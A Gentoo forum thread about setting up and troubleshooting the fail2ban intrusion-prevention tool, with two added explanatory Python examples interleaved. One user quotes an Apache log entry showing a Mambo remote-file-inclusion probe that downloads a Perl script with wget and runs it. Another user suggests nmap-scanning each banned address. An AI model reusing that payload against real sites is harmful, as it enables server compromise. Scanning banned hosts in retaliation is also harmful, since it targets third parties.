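    if entry not in lines:
        lines.append(entry)
        write_entries(path, lines)
    return lines


def unban(ip, path=HOSTS_DENY):
    """Remove exactly the 'ALL: <ip>' line (whole-line comparison, no regex), so
    no empty line is left and 'ALL: 10.0.0.10' survives an unban of 10.0.0.1."""
    entry = entry_for(ip)
    lines = read_entries(path)
    kept = [line for line in lines if line != entry]
    if len(kept) != len(lines):
        write_entries(path, kept)
    return kept


def scratch_hosts_deny(initial):
    """A throwaway hosts.deny for experiments (constructed helper); returns its path."""
    fd, path = tempfile.mkstemp(prefix="hosts.deny.demo.")
    with os.fdopen(fd, "w") as fh:
        fh.write("".join(line + "\n" for line in initial))
    return path


if __name__ == "__main__":
    # Hypothetical fail2ban.conf wiring for this script:
    #   fwban   = python3 hostsdeny.py ban <ip>
    #   fwunban = python3 hostsdeny.py unban <ip>
    action, address = sys.argv[1], sys.argv[2]
    {"ban": ban, "unban": unban}[action](address)
```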

----------

## Vanquirius

bug 119036 requests fail2ban stabilization and I intend to do it soon. If you have bugs, I appreciate your input.

----------

## LostControl

 *kojiro wrote:*   

> I got fail2ban working without iptables. Just hosts.deny. It required some hackery, but for your amusement:
> 
> ```
> [SSH]
> 
> ...

 

Hi,

Nice  :Very Happy:  That demonstrates the flexibility of fail2ban  :Wink:  Could I integrate this as an example in fail2ban package?

Netfilter blocks the attacker at kernel level. hosts.deny is at user level. But the final result is (almost) the same  :Wink:  If you are really paranoid, you could do that:

```
[SSH]
enabled = true
logfile = /var/log/sshd/current
fwstart =
fwend   =
fwcheck =
fwban   = /etc/init.d/net.eth0 stop
fwunban = /etc/init.d/net.eth0 start
timeregex = \S{3}\s{1,2}\d{1,2} \d{2}:\d{2}:\d{2}
timepattern = %%b %%d %%H:%%M:%%S
failregex = Authentication failure|Failed password|Invalid user
```

 :Laughing: 

I plan to add an ebuild like system for banning/unbanning in the next development version. However, I'm really busy until March  :Crying or Very sad: 

Thank you

----------

## kojiro

 *LostControl wrote:*   

> Could I integrate this as an example in fail2ban package?

 

Sure, of course. One warning -- it adds a blank line to hosts.deny after every unban. I mean to clean that up sometime soon.  :Smile: 

LostControl, I have some questions for you. The current fail2ban ebuild and default configuration works nicely, so I don't want to break it, but I did want to discuss some potential changes before submitting anything to bugzilla.

Proposed change 1: Dependency on firewall

As I demonstrated it's not necessary for fail2ban to rely on a firewall service to successfully ban baddies. Nevertheless the default configuration is for iptables, and that seems to be your intent. I propose a USE flag that determines whether or not a firewall gets installed along with Fail2ban.

Proposed change 2: Fail2ban runs as root

Fail2ban is currently configured to run as root. It's simple enough to create and run as a fail2ban user and group, but fail2ban is so flexible, it's hard to predict exactly what permissions to give that user. The default configuration could (again) be for iptables.

What do you think?

********************************************************************************

 *LostControl wrote:*   

> If you are really paranoid, you could do:
> 
> ```
> fwban   = /etc/init.d/net.eth0 stop
> 
> ...

 

Then every dictionary attack becomes a DoS.  :Wink: 

----------

## LostControl

 *kojiro wrote:*   

>  *LostControl wrote:*   Could I integrate this as an example in fail2ban package? 
> 
> Sure, of course. One warning -- it adds a blank line to hosts.deny after every unban. I mean to clean that up sometime soon. 

 

Thank you  :Very Happy:  Will be added for 0.6.1.

 *kojiro wrote:*   

> Proposed change 1: Dependency on firewall
> 
> As I demonstrated it's not necessary for fail2ban to rely on a firewall service to successfully ban baddies. Nevertheless the default configuration is for iptables, and that seems to be your intent. I propose a USE flag that determines whether or not a firewall gets installed along with Fail2ban.

 

Fail2ban was designed to use iptables. However, it is flexible enough to work with other kinds of firewall without changes in the code. I know that Gentoo devs are not really happy when adding new local USE flags. There is no global "iptables" or "firewall" USE flag. Maybe a warning at the end of the emerge which says:

 *Quote:*   

> * If you want to use the default configuration, please emerge iptables and look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.iptables.
> 
> * If you want to use shorewall, please emerge shorewall and look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.shorewall.
> 
> * If you want to use host.deny, please look at /usr/share/doc/fail2ban-0.6.1/fail2ban.conf.hostdeny.

 

I do not think it is a good idea to add "iptables", "shorewall" and "hostdeny" USE flags. Maybe a Gentoo dev's opinion would be great  :Wink:  Euh... I just discovered that it would be really easy to add shorewall support to Fail2ban  :Very Happy: 

 *Quote:*   

> Dynamic blacklisting is not dependent on the blacklist option in /etc/shorewall/interfaces.
> 
> Example 1. Ignore packets from a pair of systems
> 
>     shorewall drop 192.0.2.124 192.0.2.125
> ...

 

Will do it for 0.6.1  :Wink: 

 *kojiro wrote:*   

> Proposed change 2: Fail2ban runs as root
> 
> Fail2ban is currently configured to run as root. It's simple enough to create and run as a fail2ban user and group, but fail2ban is so flexible, it's hard to predict exactly what permissions to give that user. The default configuration could (again) be for iptables.

 

A "fail2ban" user would be great for security. However, modifications to iptables or hosts.deny require "root" privileges.

 *kojiro wrote:*   

> ********************************************************************************
> 
>  *LostControl wrote:*   If you are really paranoid, you could do:
> 
> ```
> ...

 

Yes, not really good  :Wink:  What do you think about this one:

```
fwban = nmap -F -TInsane -P0 <ip> >> /var/log/fail2ban-nmap.log
```

Mmmhhh... I suspect a bug with the above rule  :Sad:  I'm pretty sure that Fail2ban will wait for the end of the scan  :Confused:  Maybe this could be fixed by adding a '&' at the end of the rule. I have to check this.

A+

----------

## LostControl

Now that Fail2ban is in Portage and marked as stable, could a moderator move this thread to Networking & Security?

Thank you

----------

## kojiro

Felicitations! (Sorry, my French is rusty.)

 *LostControl wrote:*   

> Now that Fail2ban is in Portage and marked as stable...

 

LostControl, you should also update your Web site to reflect that! (BTW, Using ACCEPT_KEYWORDS="~x86" on the command line is now officially discouraged.)

 :Razz: 

----------

## Vanquirius

 *kojiro wrote:*   

> (BTW, Using ACCEPT_KEYWORDS="~x86" on the command line is now officially discouraged.)

 

Hey, it's x86 and amd64 stable now  :Wink: .

----------

## Earthwings

Moved from Unsupported Software to Networking & Security.

----------

## LostControl

Hi,

Here is the current CHANGELOG for the next release (in 2-3 weeks, maybe less).

```
ver. 0.6.? (200?/??/??) - ???
----------
- Added permanent banning. Set banTime to a negative value to
  enable this feature (-1 is perfect). Thanks to Mannone
- Fixed locale bug. Thanks to Fernando José
- Fixed crash when time format does not match data
- Propagated patch from Debian to fix fail2ban search path
  addition to the path search list: now it is added first.
  Thanks to Nick Craig-Wood
- Added SMTP authentication for mail notification. Thanks
  to Markus Hoffmann
- Removed debug mode as it is confusing for people
- Added parsing of timestamp in TAI64N format (#1275325).
  Thanks to Mark Edgington
- Added patch #1382936 (Default formatted syslog logging).
  Thanks to Patrick Börjesson
- Removed 192.168.0.0/16 from ignoreip. Attacks could also
  come from the local network.
- Robust startup: if iptables module does not get fully
  initialized after startup of fail2ban, fail2ban will do
  "maxreinit" attempts to initialize its own firewall. It
  will sleep between attempts for "polltime" number of
  seconds (closes Debian: #334272). Thanks to Yaroslav
  Halchenko
- Added "interpolations" in fail2ban.conf. This is provided
  by the ConfigParser module. Old configuration files still
  work. Thanks to Yaroslav Halchenko
- Added initial support for hosts.deny and shorewall. Need
  more testing. Please test. Thanks to kojiro from Gentoo
  forum for hosts.deny support
```

I added initial support for shorewall and hosts.deny. Do not hesitate to test these new features and report issues. You just need to check out CVS HEAD. Instructions are available here.

To test shorewall support, copy config/fail2ban.conf.shorewall to /etc/fail2ban.conf

To test hosts.deny support, copy config/fail2ban.conf.hostsdeny to /etc/fail2ban.conf

config/fail2ban.conf.default is now config/fail2ban.conf.iptables

A+

----------

## LostControl

Hi,

I have created an ebuild which installs the current CVS HEAD of Fail2ban.

http://fail2ban.sourceforge.net/ebuilds/fail2ban-20060211.ebuild

I would really appreciate if someone could test shorewall and hosts.deny support  :Very Happy: 

Thanks

----------

## xsteadfastx

Yesterday I discovered fail2ban and it looks like it's exactly what I was searching for. But my question is... does it work with metalog? Do I need to change something in the config to get it running with metalog? Thanks already for this wonderful piece of software.

----------

## LostControl

 *xsteadfastx wrote:*   

> does it work with metalog?

 

Yes of course  :Wink:  I'm using metalog too. For sshd, you can directly monitor "/var/log/pwdfail/current".

A+

----------

## gary441

I get this message in /var/log/fail2ban.log file when i start fail2ban

 WARNING:  is not a valid IP address

I'm not sure where it's coming from. It looks like fail2ban doesn't know what IP to watch.

Any ideas?

Gary

----------

## ryker

Thank you very much for this piece of software.  It seems to be doing a great job for most, but I have noticed some things that it doesn't catch.

For instance, I get this in my logs a lot:

```
Mar 10 17:18:01 emsvs1 sshd[26618]: reverse mapping checking getaddrinfo for www.mproduction.dz failed - POSSIBLE BREAKIN ATTEMPT!
```

I usually get hundreds of lines in a row for things like this.  What can I do to stop this?

Thanks

----------

## ryker

anyone have some suggestions for my previous post?

----------

## Tanisete

You can maybe add the final "possible breakin..." to the regex, but without an IP to ban it would be difficult.

Does anyone have fail2ban working with proftpd? I'm trying to do it without success right now.

Thanks a lot!

----------

## namo

 *ryker wrote:*   

> For instance, I get this in my logs a lot:
> 
> ```
> 
> Mar 10 17:18:01 emsvs1 sshd[26618]: reverse mapping checking getaddrinfo for www.mproduction.dz failed - POSSIBLE BREAKIN ATTEMPT!
> ...

 

Try with 

```
UseDNS no
```

 in /etc/ssh/sshd_config and you should have the numeric IPs appearing in your logs.

----------

## ryker

thanks.  I'll give that a try.

----------

## Tanisete

Only to say, I finally got it working with proftpd and shorewall for banning and unbanning.

Cheers!

----------

## ryker

Yeah, this is a great little script. I actually have it running on a vserver system that has 4 guest OSes on it, and it's using shorewall to ban the IPs. I have fail2ban running on the host OS monitoring the SSH logs for the host and all 4 guests. Works great.

Thanks

----------

## turbito

Hello!!!

Sorry for my english!!   :Rolling Eyes: 

I'm testing fail2ban for use on my servers. After 3 days it is working on SUSE 9.1, and fail2ban can log the attempts at "remote file inclusion" in Mambo using wget to download a Perl script.

I don't like manually building a list of the IP addresses trying to use my server as an IRC server with cat, grep, etc., and adding these IPs to a file of blocked hosts used by my firewall (arno). 

This is a real example from the Apache log:

81.25.68.146 - - [19/May/2006:17:15:46 +0200] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/memberz/travma;perl%20travma;rm%20-rf%20travma? HTTP/1.0" 200 340 "-" "Mozilla/5.0"

But sometimes fail2ban detects 3 IP addresses: 

-from apache:

aa.bb.cc.dd - - [19/May/2006:19:45:45 +0200] "GET /portal/index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=31 HTTP/1.1" 200 11126 "http://170.210.136.16/" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2"

-from fail2ban:

2006-05-19 19:49:22,340 DEBUG: /var/log/apache2/access_log has been modified

2006-05-19 19:49:22,341 DEBUG: /var/log/apache2/access_log

2006-05-19 19:49:22,341 DEBUG: Setting file position to 1100046L for /var/log/apache2/access_log

2006-05-19 19:49:22,342 DEBUG: Found aa.bb.cc.dd

2006-05-19 19:49:22,343 DEBUG: Found 1.8.0.2

2006-05-19 19:49:22,343 DEBUG: Found 1.5.0.2

Where

aa.bb.cc.dd = IP address of my testing machine,

1.8.0.2 and 1.5.0.2 are version numbers reported by Firefox.

Any trick to avoid this?

TIA!!
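
The behaviour turbito reports above, reproduced as an added example (this is not code from the thread or from fail2ban). Fail2ban 0.6 matched failregex against a line and then collected everything on that line that looked like an IP address, so dotted version numbers in a User-Agent string became candidate hosts; fail2ban 0.7 and later take the address only from the <HOST> group of the failregex. The access_log lines are constructed copies of the ones quoted above with documentation addresses substituted, the Mambo RFI failregex is written for this example and is not a shipped filter, and expand_host_tag, naive_hosts, anchored_host and is_syntactically_valid are names of this example only:

```python
"""Added example (not fail2ban's own code): why the host must come from an
anchored <HOST> group rather than from a scan of the whole line.

Fail2ban 0.6 matched failregex and then collected everything on the matching
line that looked like an IP address, which is how "rv:1.8.0.2" and
"Firefox/1.5.0.2" from the User-Agent became candidate hosts above.
Fail2ban 0.7+ takes the address only from the <HOST> group of the failregex.
Both behaviours are reimplemented here on constructed access_log lines that
use documentation addresses; the RFI failregex is this example's own."""
import ipaddress
import re

DOTTED_QUAD = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def expand_host_tag(failregex):
    """Turn fail2ban's <HOST> placeholder into a named group, as fail2ban does."""
    return re.compile(failregex.replace("<HOST>", r"(?P<host>\S+)"))


# Hypothetical failregex for the Mambo remote-file-inclusion probe quoted above:
# the client is the first field of a combined-format line, and the request
# must carry a parameter whose value is a remote URL.
RFI_FAILREGEX = expand_host_tag(
    r'^<HOST> - \S+ \[[^\]]+\] "(?:GET|POST) \S*?=https?://')

# Constructed sample lines modelled on the access_log entries quoted above.
BENIGN_LINE = (
    '192.0.2.7 - - [19/May/2006:19:45:45 +0200] '
    '"GET /portal/index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=31 HTTP/1.1" '
    '200 11126 "http://203.0.113.1/" '
    '"Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2"')
RFI_LINE = (
    '198.51.100.9 - - [19/May/2006:17:15:46 +0200] '
    '"GET /portal/index.php?_REQUEST[option]=com_content'
    '&mosConfig_absolute_path=http://203.0.113.5/cmd.txt? HTTP/1.0" '
    '200 340 "-" "Mozilla/5.0"')


def naive_hosts(line):
    """0.6-style extraction: every dotted quad anywhere on the line."""
    return DOTTED_QUAD.findall(line)


def anchored_host(line, failregex=RFI_FAILREGEX):
    """0.7-style extraction: the <HOST> group of a matching failregex, else None."""
    m = failregex.search(line)
    return m.group("host") if m else None


def is_syntactically_valid(candidate):
    """True when the string parses as an IP address. Version numbers such as
    1.8.0.2 pass, so validation alone cannot repair naive extraction."""
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def compare(line):
    """Return (naive candidates, anchored host) for one line."""
    return naive_hosts(line), anchored_host(line)


if __name__ == "__main__":
    for line in (BENIGN_LINE, RFI_LINE):
        naive, anchored = compare(line)
        print("naive:", naive, "| anchored:", anchored)
```

On the benign line the naive scan yields four candidates (the client, the referrer host and both Firefox version numbers) while the anchored regex yields nothing, because a normal category request carries no remote URL; on the RFI probe the naive scan also returns the attacker's download host, which is not the client to ban. Validation does not rescue the naive approach, since every one of those strings is a well-formed address; only tying <HOST> to a fixed field of the log format keeps them out. With 0.7 and later the same check can be made against a live filter with the fail2ban-regex tool mentioned further down the thread.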

----------

## alinv

I get a lot of these in fail2ban.log:

 *Quote:*   

> 2006-07-18 20:56:22,295 ERROR: Please check the format and your locale settings.
> 
> 2006-07-18 20:56:22,296 ERROR: time data did not match format:  data=Jul 18 14:44:32  fmt=%b %d %H:%M:%S

 

and I can't figure out what's wrong.

Any ideas?

Thanks,

Alin

----------

## LostControl

 *alinv wrote:*   

> I get a lot o these in fail2ban.log:
> 
>  *Quote:*   2006-07-18 20:56:22,295 ERROR: Please check the format and your locale settings.
> 
> 2006-07-18 20:56:22,296 ERROR: time data did not match format:  data=Jul 18 14:44:32  fmt=%b %d %H:%M:%S 
> ...

 

If your locales are not set to "en_US", could you try this:

```
# LC_ALL="en_US" fail2ban -vv
```

Some daemons do not take the locale settings into account and use "en_US" or "POSIX". Others do take your locale settings into account and output a localized time pattern.

----------

## Growlizing

Hi, I can't seem to get this to work (using v. 0.6.1 and a slightly modified version of this: iptables as iptables firewall, executed through /etc/init.d/local last in the boot-up process). After having fail2ban running for only a few seconds, my log looks like this:

 *Quote:*   

> 
> 
> 2006-08-05 02:33:32,271 WARNING: Verbose level is 1
> 
> 2006-08-05 02:33:32,278 INFO: Fail2Ban v0.6.1 is running
> ...

 

Does anyone know what I'm doing wrong?

And here is my fail2ban config file.

EDIT:

Seems like this:

 *Quote:*   

> 
> 
> iptables -I INPUT -p tcp --dport 25 12000 -j fail2ban-SSH' failed
> 
> 

 

part is what creates all the troubles, but how can I make it drop two ports?

I'll have a go at something I'm thinking of...

Will be back with results..

EDIT 2:

Hehe, *Solved*.

Put this line at the bottom of my [SSHD] section:

 *Quote:*   

> 
> 
> fwstart = iptables -N fail2ban-%(__name__)s
> 
>           iptables -A fail2ban-%(__name__)s -j RETURN
> ...

 

At least no errors occurred in the log  :Smile: 

EDIT 3:

Guess I was wrong:

 *Quote:*   

> 
> 
> 2006-08-05 18:40:21,248 WARNING: Verbose level is 1
> 
> 2006-08-05 18:40:21,255 INFO: Fail2Ban v0.6.1 is running
> ...

 

So, can anyone help me on this?  :Smile: 

----------

## LostControl

Hi,

 *Growlizing wrote:*   

> So, can anyone help me on this? 

 

In order to set multiport in iptables rules, you must have

```
CONFIG_NETFILTER_XT_MATCH_MULTIPORT=y
```

in your kernel.

I suggest you try the commands manually. First run the command in fwstart and check that everything went fine. Then run the command in fwban. You will get better error messages about the problem.

----------

## bluni

I receive the following error in my /var/log/fail2ban.log file:

```
2006-08-10 20:15:01,663 WARNING: Verbose level is 1
2006-08-10 20:15:01,664 INFO: Fail2Ban v0.6.1 is running
2006-08-10 20:15:01,671 WARNING:  is not a valid IP address
```

Is this due to a regex failure? I use metalog.

Thanks,

Brian

----------

## bluni

Never mind, that must be a common log entry for the time it starts up.

Sorry to bother.

Brian

----------

## LostControl

Hi,

 *bluni wrote:*   

> I receive the following error in my /var/log/fail2ban.log file:
> 
> ```
> 
> 2006-08-10 20:15:01,663 WARNING: Verbose level is 1
> ...

 

Nothing is wrong here  :Very Happy:  You probably have the "ignoreip" option empty.

----------

## LostControl

Hi,

I'm (almost) completely rewriting Fail2ban. Since the end of August, the first 0.7.x releases have been available. There are lots of new features since 0.6.1. I suggest you look at these links:

http://fail2ban.sourceforge.net/wiki/index.php/Features#Roadmap

http://fail2ban.sourceforge.net/wiki/index.php/HOWTO_fail2ban_0.7.x

Ebuilds are available here or here.

I would really appreciate some feedback  :Wink: 

----------

## novazur

I don't understand how to use the latest version with shorewall.

And I can't find how to make fail2ban restart when restarting shorewall.

And, finally, I don't understand why, when I restart fail2ban, it bans again an IP that was unbanned:

```
18:32:53 root@serveur1 /etc/fail2ban # fail2ban-client status ssh-iptables
Status for the jail: ssh-iptables
|- filter
|  |- Currently failed:         0
|  `- Total failed:             15
`- action
   |- Currently banned:         0
   `- Total banned:             2
18:33:12 root@serveur1 /etc/fail2ban # /etc/init.d/fail2ban restart
 * Stopping fail2ban ...                                    [ ok ]
 * Starting fail2ban ...                                    [ ok ]
18:33:23 root@serveur1 /etc/fail2ban # fail2ban-client status ssh-iptables
Status for the jail: ssh-iptables
|- filter
|  |- Currently failed:         0
|  `- Total failed:             6
`- action
   |- Currently banned:         1
   `- Total banned:             1
```

PS : sorry for my poor english.

----------

## LostControl

Hi,

Sorry for the late reply  :Sad: 

 *novazur wrote:*   

> I don't understand how to use the lastest version with shorewall.
> 
> And I don't find how to make fail2ban restart when restarting shorewall.

 

I added a shorewall script to the Subversion repository. It will be in 0.7.4. Fail2ban should recreate the chains automatically if they disappear. However, a bug was found in <= 0.7.3. This should work again with the next release.

 *novazur wrote:*   

> And, finally, I don't understand why, when I restart fail2ban, it bans again an ip that was unbanned

 

When you start Fail2ban, it looks a bit further back than "bantime". Thus, it is possible to see an unbanned host being banned again. This can be adjusted.

 *novazur wrote:*   

> PS : sorry for my poor english.

 

Mine is probably worse  :Wink: 
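
The behaviour LostControl describes here (a host banned again after a restart because Fail2ban reads back into the log), together with the locale error alinv hit and the empty-ignoreip warning gary441 and bluni saw, modelled in an added example. This is not fail2ban's code and not anything posted in the thread: the Jail class with its replay and demo helpers, the sshd failregex, the log lines (the serveur1 hostname is borrowed from novazur's prompt; addresses are documentation ranges), the year 2006 and the UTC clock are all this example's own assumptions, and the restart model (expired bans forgotten, log re-read, only failures newer than now minus findtime counted) is a simplification of what the daemon does:

```python
"""Added example, not fail2ban's own code: a minimal jail over constructed
syslog lines showing locale-independent timestamp parsing, ignoreip
validation (an empty setting yields the '' of the " is not a valid IP
address" warning), a sliding findtime window, and why a restart that
re-reads the log can ban an address whose earlier ban had already expired.
Assumptions: year 2006 (syslog omits it), UTC, own sshd failregex."""
import ipaddress
import re
from datetime import datetime, timezone

MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}
SYSLOG_TS = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<hh>\d\d):(?P<mm>\d\d):(?P<ss>\d\d)\b")
FAILREGEX = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (?P<host>\S+) port \d+")

def parse_syslog_time(line, year=2006):
    """Epoch seconds for a 'Jul 18 14:44:32' prefix (None if absent); a fixed
    month table instead of time.strptime, so LC_TIME cannot break it."""
    m = SYSLOG_TS.match(line)
    if m is None:
        return None
    return datetime(year, MONTHS[m["mon"]], int(m["day"]), int(m["hh"]),
                    int(m["mm"]), int(m["ss"]), tzinfo=timezone.utc).timestamp()

def parse_ignoreip(value):
    """Split a space-separated ignoreip into (networks, rejected entries)."""
    networks, rejected = [], []
    for entry in value.split(" "):   # "" splits to [""]: the warning's empty name
        try:
            networks.append(ipaddress.ip_network(entry, strict=False))
        except ValueError:
            rejected.append(entry)
    return networks, rejected

class Jail:
    def __init__(self, findtime=600, maxretry=5, bantime=600, ignoreip=""):
        self.findtime, self.maxretry, self.bantime = findtime, maxretry, bantime
        self.ignore, self.ignore_rejected = parse_ignoreip(ignoreip)
        self.failures = {}   # host -> failure times still inside findtime
        self.banned = {}     # host -> clock time the ban was applied

    def is_ignored(self, host):
        addr = ipaddress.ip_address(host)
        return any(addr in net for net in self.ignore)

    def expire_bans(self, now):
        """Lift bans older than bantime; a negative bantime means permanent."""
        if self.bantime < 0:
            return
        for host, since in list(self.banned.items()):
            if now - since >= self.bantime:
                del self.banned[host]

    def feed(self, line, now=None):
        """Count one line; `now` defaults to the line's own timestamp."""
        t, m = parse_syslog_time(line), FAILREGEX.search(line)
        if t is None or m is None:
            return
        now = t if now is None else now
        self.expire_bans(now)
        host = m["host"]
        if self.is_ignored(host) or host in self.banned or now - t > self.findtime:
            return
        hits = [x for x in self.failures.get(host, []) if now - x <= self.findtime] + [t]
        if len(hits) < self.maxretry:
            self.failures[host] = hits
        else:
            self.failures.pop(host, None)
            self.banned[host] = now

    def replay(self, lines, now=None):
        """Feed every line. With now=None (tailing live) the log time is the
        clock; after a restart pass the real clock, and bans are stamped with it."""
        for line in lines:
            self.feed(line, now)
        return self

# Constructed log: five failures in 40 s from one address, one from a LAN address
# covered by ignoreip, then a successful login (matched by nothing).
SAMPLE_LOG = [
    f"Jul 18 14:40:{sec:02d} serveur1 sshd[10{n}]: Failed password for invalid user "
    f"admin from 203.0.113.8 port 4000{n} ssh2"
    for n, sec in enumerate(range(0, 50, 10), start=1)
] + [
    "Jul 18 14:40:50 serveur1 sshd[1006]: Failed password for root from 192.168.1.5 port 40010 ssh2",
    "Jul 18 14:41:00 serveur1 sshd[1007]: Accepted publickey for alice from 198.51.100.2 port 40011 ssh2",
]

IGNORE = "127.0.0.1 192.168.1.0/24"

def demo():
    """Live run, ban expiry, a restart, and a permanent ban; returns each state."""
    jail = Jail(findtime=600, maxretry=5, bantime=300, ignoreip=IGNORE).replay(SAMPLE_LOG)
    first_run = dict(jail.banned)               # 203.0.113.8 banned at 14:40:40
    now = parse_syslog_time("Jul 18 14:46:00")  # 320 s later: that ban has expired
    jail.expire_bans(now)
    # Restart: expired bans are forgotten and the log is re-read at `now`, so the
    # five failures still inside findtime ban the address a second time.
    restarted = Jail(600, 5, 300, IGNORE).replay(SAMPLE_LOG, now)
    permanent = Jail(600, 5, -1, IGNORE).replay(SAMPLE_LOG, now)
    permanent.expire_bans(now + 10 * 365 * 86400)
    return {
        "first_run": first_run,
        "after_expiry": dict(jail.banned),
        "after_restart": dict(restarted.banned),
        "permanent_still_banned": "203.0.113.8" in permanent.banned,
    }
```

demo() returns the four observable states: the first run bans 203.0.113.8 and the ban has expired by 14:46:00, yet the restarted jail bans it again at once because its five failures are still inside findtime, which is the sequence novazur's two status listings show; with bantime set to -1, as the 0.6 changelog above describes, expire_bans never lifts the ban. The LAN address is skipped because it falls inside an ignoreip network, and parse_ignoreip("") reports one empty entry, the blank name in the " is not a valid IP address" warning. Month names are looked up in a fixed table rather than through time.strptime, which is what fails when the daemon runs under a non-English LC_TIME; the LC_ALL="en_US" workaround above attacks the same problem from the other side.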

----------

## BlackB1rd

 *Tanisete wrote:*   

> Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers!

 

Can you post the regex for proftpd? Thanks.

----------

## gotaserena

I upgraded to version 0.7.X and now fail2ban is failing to ban! (no pun intended)

fail2ban-regex gives success for the usual sshd.log line, the sshd action is turned "true" in jail.conf and it is calling the iptables action (which I have not edited).

I don't know what to do. Is there an error list check I have to go through or should I downgrade to 0.6.X?

TIA

----------

## c4

gotaserena, I experienced something similar when trying fail2ban 0.72 earlier, something like a month ago. I found that fail2ban was not blocking the intruders trying to brute-force sshd on my server. At the time I did not have the time to find out what was not working, so I just took the easy way out and downgraded back to version 0.6. Then things were working as intended.

So I can confirm that there might be some issues with fail2ban-0.72. Seeing that it is still marked testing in portage and there are not any bug reports in bugzilla regarding 0.7.. perhaps the latest version 0.74 from the fail2ban website might work better.

----------

## gotaserena

Thanks C4 (hei, I've got a Xantia myself!) this is good enough for me. Masked 0.7.2 and I'm happy again with 0.6.1-r1.

----------

## acarstoiu

I just wanted to tell the interested users that I'm successfully using fail2ban-0.7.5 for SSH server protection. The filtering regular expression is

```
failregex = (?:(?:Authentication failure)|(?:Failed password)|(?:[iI](?:llegal|nvalid) user)|(?:Did not receive identification string)|(User)) .*(?:from|FROM) <HOST>(?(1).* not listed in AllowUsers)
```

(in a single line, naturally)

----------

## thoughtform

 *BlackB1rd wrote:*   

>  *Tanisete wrote:*   Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers! 
> 
> Can you post the regex for proftpd? Thanks.

 

I 2nd this request....

----------

## BlackB1rd

 *WanderingStar wrote:*   

>  *BlackB1rd wrote:*    *Tanisete wrote:*   Only to say, i finally got it working with proftpd and shorewall for banning and unbanning.
> 
> Cheers! 
> 
> Can you post the regex for proftpd? Thanks. 
> ...

 

These days the filter for proftpd is included, so I guess you're running an outdated version.

----------

## zendmaster

I thought I'd post my 2 cents to this thread since I had trouble getting fail2ban to work from vsftpd.

Thought I would post how I got it to work since I couldn't find it in these forums.

First I had to go into my kernel configuration and turn on iptables.  That was the easy part.  The hard part was finding a failregex for vsftpd.  I finally found one that worked.  It is:

```
failregex = \[.+\] FAIL LOGIN: Client "(?P<host>\S+)"$
```

Hope this helps others. I should also mention that this is fail2ban-0.6.2-r1.

I tried 0.7.6-r1, but I found it would only monitor vsftpd and email a warning. It didn't ban the IP. The earlier version works to ban the IP.

----------

## ryker

I was wondering if someone could help me with configuring the email that is sent when someone is banned. Right now, even though I have specified a name and subject, all emails are sent to me as user root with an empty subject. This is from SSH failures that are banned using shorewall.

I added the following to /etc/fail2ban/jail.conf.

```
[ssh-shorewall]
enabled  = true
filter   = sshd
action   = shorewall
           mail-whois[name="fail2ban",subject="[fail2ban]", dest=myemail@gmail.com]
logpath  = /var/log/messages
bantime  = 600
maxretry = 5
```

What I would like is for the email to say that it came from "fail2ban" and the subject to contain "[fail2ban]".

BTW, I'm just using ssmtp.  This used to work fine with the older versions of fail2ban before all of the config files changed.

Thanks

----------

## tedj

fail2ban-0.8.0-r1 doesn't seem to be working correctly, either.

It starts up and adds the chains, such that you can verify them via "iptables -L", but it doesn't seem to obey the configuration values for bantime and/or findtime.

Here's the fail2ban-regex output (consolidated):

 *Quote:*   

> Running tests
> 
> =============
> 
> Use regex file : /etc/fail2ban/filter.d/sshd.conf
> ...

 

Regardless of what is set for the two times, it will never set any filter for pre-existing addresses in the log files. I've tried the default values, I've tried setting values at default * 2 up to 999999999, and now I'm trying the documented (and previously working) negative one.

Here's my relevant jail.conf:

 *Quote:*   

> 
> 
> [DEFAULT]
> 
> # edited the ignore addresses for this forum post
> ...

 

----------

## gr0x0rd

LostControl hasn't posted in this thread in over 3 years so maybe he's not part of the fail2ban dev team anymore... shame.

2 questions... has anyone put together a working configuration using complain.conf that they are willing to share? The only thing I'd like more than receiving an email that someone has been banned is sending that same message to the admin of the source network. Booya.

The second question, I recently ran into a problem where fail2ban would ban an IP, and yet this IP continued to hammer me; I had to ban the whole range to stop the attack. I'm still not sure how this was accomplished, but it would be great to see this capability added to fail2ban.

Thanks so much for this awesome tool, it will have a happy home on all my servers for years to come.

----------

